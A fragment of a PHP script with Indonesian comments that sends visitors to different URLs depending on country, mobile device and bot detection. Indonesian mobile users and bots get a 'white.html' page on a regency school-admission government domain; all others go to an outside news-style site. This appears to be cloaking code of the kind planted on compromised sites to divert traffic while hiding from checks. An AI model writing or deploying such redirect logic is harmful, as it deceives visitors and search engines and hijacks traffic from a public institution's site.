";
// echo "Is Mobile: " . ($isMobile ? 'Yes' : 'No') . "
";
// echo "Country: " . $country . "
";
// Redirect berdasarkan kondisi negara, perangkat, dan bot
if ($country === 'Indonesia' && ($isMobile || $isBot)) {
// Redirect ke halaman untuk Indonesia, mobile, atau bot
header('Location: https://ppdb.halmaheraselatankab.go.id/white.html');
} else {
// Redirect ke halaman untuk selain Indonesia atau perangkat lainnya
header('Location: https://berita-terkini.id/ppdb-halmaheraselatankab/');
}
// Akhiri eksekusi setelah redirect
exit;
?>